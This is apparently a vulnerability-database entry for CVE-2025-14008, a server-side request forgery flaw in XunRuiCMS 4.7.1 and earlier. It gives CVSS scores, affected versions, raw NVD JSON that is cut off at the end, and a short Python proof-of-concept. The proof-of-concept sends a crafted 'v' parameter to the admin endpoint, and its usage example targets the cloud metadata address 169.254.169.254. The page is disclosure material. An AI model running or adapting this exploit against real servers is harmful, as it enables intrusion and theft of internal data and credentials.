Security Vulnerability Report
中文
CVE-2025-14008 CVSS 4.7 MEDIUM

CVE-2025-14008

Published: 2025-12-04 15:15:56
Last Modified: 2026-04-29 01:00:02
Source: [email protected]

Description

A flaw has been found in dayrui XunRuiCMS up to 4.7.1. This vulnerability affects unknown code of the file admin79f2ec220c7e.php?c=api&m=test_site_domain of the component Project Domain Change Test. This manipulation of the argument v causes server-side request forgery. It is possible to initiate the attack remotely. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way.

CVSS Details

CVSS Score
4.7
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:xunruicms:xunruicms:*:*:*:*:*:*:*:* - VULNERABLE
dayrui XunRuiCMS <= 4.7.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-14008 PoC - SSRF in XunRuiCMS test_site_domain # Target: dayrui XunRuiCMS <= 4.7.1 # Component: admin79f2ec220c7e.php?c=api&m=test_site_domain def exploit_ssrf(target_url, payload_url): """ Exploit SSRF vulnerability by sending crafted 'v' parameter Args: target_url: Base URL of the vulnerable XunRuiCMS installation payload_url: URL to request (e.g., internal service, file://, etc.) """ # Construct the vulnerable endpoint endpoint = f"{target_url.rstrip('/')}/admin79f2ec220c7e.php" # Parameters for SSRF exploitation params = { 'c': 'api', 'm': 'test_site_domain', 'v': payload_url # Malicious payload - SSRF trigger } try: print(f"[*] Target: {target_url}") print(f"[*] Payload URL: {payload_url}") print(f"[*] Sending request...") # Send request with admin credentials (required) response = requests.get(endpoint, params=params, timeout=10) print(f"[+] Status Code: {response.status_code}") print(f"[+] Response Length: {len(response.text)}") if response.status_code == 200: print("[+] Request successful - SSRF vulnerability confirmed") print(f"[>] Response preview: {response.text[:500]}") else: print("[-] Request failed") except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") if __name__ == "__main__": if len(sys.argv) < 3: print("Usage: python cve-2025-14008.py <target_url> <payload_url>") print("Example: python cve-2025-14008.py http://target.com http://169.254.169.254/latest/meta-data/") sys.exit(1) target = sys.argv[1] payload = sys.argv[2] exploit_ssrf(target, payload)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-14008", "sourceIdentifier": "[email protected]", "published": "2025-12-04T15:15:56.057", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw has been found in dayrui XunRuiCMS up to 4.7.1. This vulnerability affects unknown code of the file admin79f2ec220c7e.php?c=api&m=test_site_domain of the component Project Domain Change Test. This manipulation of the argument v causes server-side request forgery. It is possible to initiate the attack remotely. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way."}, {"lang": "es", "value": "Se ha encontrado una falla en dayrui XunRuiCMS hasta la versión 4.7.1. Esta vulnerabilidad afecta a código desconocido del archivo admin79f2ec220c7e.php?c=API&amp;m=test_site_domain del componente Project Domain Change Test. Esta manipulación del argumento v causa falsificación de petición del lado del servidor. Es posible iniciar el ataque de forma remota. El exploit ha sido publicado y puede ser utilizado. Se contactó al proveedor con antelación sobre esta divulgación, pero no respondió de ninguna manera."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.0, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L", "baseScore": 4.7, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.2, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:M/C:P/I:P/A:P", "baseScore": 5.8, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "MULTIPLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 6.4, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-918"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:xunruicms:xunruicms:*:*:*:*:*:*:*:*", "versionEndIncluding": "4.7.1", "matchCriteriaId": "D8A4E103-4DA6-4FB2-BF95-7288D49BBA42"}]}]}], "references": [{"url": "https://github.com/24-2021/vul/blob/main/xunruicms-test_site_domain-SSRF/xunruicms-test_site_domain-SSRF.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.334250", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https ... (truncated)
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.